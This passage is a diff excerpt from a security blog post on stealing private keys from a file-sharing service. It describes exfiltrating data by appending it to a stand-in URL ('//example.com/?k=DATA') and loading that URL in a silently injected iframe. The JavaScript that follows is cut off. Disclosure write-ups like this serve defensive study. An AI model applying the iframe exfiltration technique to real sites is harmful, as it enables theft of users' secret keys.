timvisee/timvisee.com/content/blog/2019-10-27_stealing-private-keys-from-secure-file-sharing-service/index.md

 choose to use [`iframes`][iframe].
 I suffixed the data to the end of the URL like `//example.com/?k=DATA`, and silently added an `iframe` to the page with this link.
 The browser immediately loads this `iframe`, sending us our precious data.
-We're now just a little more than an hour into this, and this is all I needed:
+This is what we need:

 ```javascript
 $('body').append(